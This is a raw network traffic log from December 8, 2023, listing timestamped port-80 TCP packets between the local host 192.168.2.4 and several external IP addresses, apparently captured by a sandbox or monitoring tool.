                                                                                                                                                            Dec 8, 2023 14:51:05.358691931 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.640043974 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.640137911 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.640383959 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.920202971 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924487114 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924539089 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924654007 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.924757957 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924849033 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924895048 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.924977064 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925085068 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925129890 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.925363064 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925404072 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925446033 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.925816059 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925882101 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925925016 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204268932 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204298973 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204360008 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204545021 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204641104 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204687119 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204972029 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205081940 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205118895 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.205405951 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205501080 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113565922 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113683939 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113739014 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.114414930 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114542007 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114597082 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.114608049 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114682913 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114738941 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115689993 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115767002 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115804911 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115822077 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115855932 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115907907 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115928888 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115968943 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116007090 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116023064 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116080046 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116152048 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116158962 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116221905 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116271973 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116453886 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116537094 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116588116 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.117196083 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117269993 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117319107 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.117778063 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117835999 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117886066 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.118340969 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.118475914 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.118526936 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.118859053 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119015932 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119067907 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.119327068 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119447947 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119498968 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.392776012 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.392806053 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.392893076 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.392987013 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393029928 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393069029 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.393497944 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393598080 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393637896 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.393683910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393758059 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393791914 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394294977 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394347906 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394387007 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394408941 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394455910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394489050 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394644976 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394766092 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394802094 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395117044 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395266056 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395312071 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395385981 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395463943 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395500898 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395977020 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.396040916 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.396081924 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397109985 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397156000 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397191048 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397538900 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397599936 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397633076 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397650957 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397713900 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397746086 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398195028 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398260117 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398297071 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398439884 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398542881 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398580074 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398952961 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399066925 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399104118 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.399476051 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399524927 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399560928 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.399971008 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400022984 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400054932 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.400479078 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400791883 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400831938 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.401024103 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401101112 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401135921 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.401506901 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401556015 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401591063 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402117014 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402164936 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402199030 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402501106 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402566910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402601957 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402978897 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403033972 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403069019 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.403551102 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403610945 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403645039 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.403985023 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404053926 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404086113 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.404459953 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404620886 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404656887 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.404952049 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.405009985 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:42.441430092 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.677983046 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:47.709320068 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:47.908075094 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:47.908282042 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:47.909106970 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.107180119 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218774080 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218889952 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218908072 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218945026 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.218985081 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.219006062 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.219034910 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.219052076 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:49.419867992 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.435796976 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.634686947 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.634891987 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.635157108 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.832496881 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925204039 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925232887 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925275087 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.925378084 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925425053 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925462961 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.925646067 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925743103 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925787926 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:52.138719082 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.154515982 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.352861881 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.353034973 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.354933023 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.552536964 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.552727938 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.552747011 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.648900986 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.648968935 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649008036 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649044991 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649080992 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649075031 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.649136066 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.649168968 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:54.857426882 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:56.758057117 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:56.957597971 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:56.957792044 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.012130022 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.209829092 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301047087 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301076889 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301099062 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301146030 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301158905 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301245928 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.301294088 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.301553965 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.498971939 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.534619093 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.658931971 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.659087896 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.659353971 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.784538031 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.983591080 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986537933 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986649036 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.986684084 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986771107 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:05.169734955 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.185972929 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.311578035 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.311975956 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.312115908 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.437676907 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637350082 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637448072 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637475014 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637497902 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.637531996 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:07.826076031 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:08.842057943 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:08.966870070 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:08.966999054 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:08.967581987 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:09.092546940 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092608929 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092642069 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092674971 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092709064 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092760086 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092792034 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092824936 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092858076 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.291145086 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294420958 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294481039 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294511080 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:09.294588089 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:10.482404947 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.498831034 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.623763084 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.623855114 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.624073982 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.748867989 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.947863102 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961240053 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961343050 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961360931 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961412907 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961452007 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961487055 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961543083 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961548090 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961569071 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961590052 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.962398052 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:12.087032080 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.354054928 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.607887030 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.607979059 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.612606049 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.867712021 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094980001 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095036983 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095081091 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095138073 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095180988 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095367908 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095411062 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:04.878972054 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.118127108 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:05.118370056 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.118521929 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.357446909 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.360938072 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.360991955 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361032009 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361063957 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361068010 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361109018 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361148119 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361149073 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361185074 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361222982 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361229897 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361280918 CET4978280192.168.2.4185.74.252.11
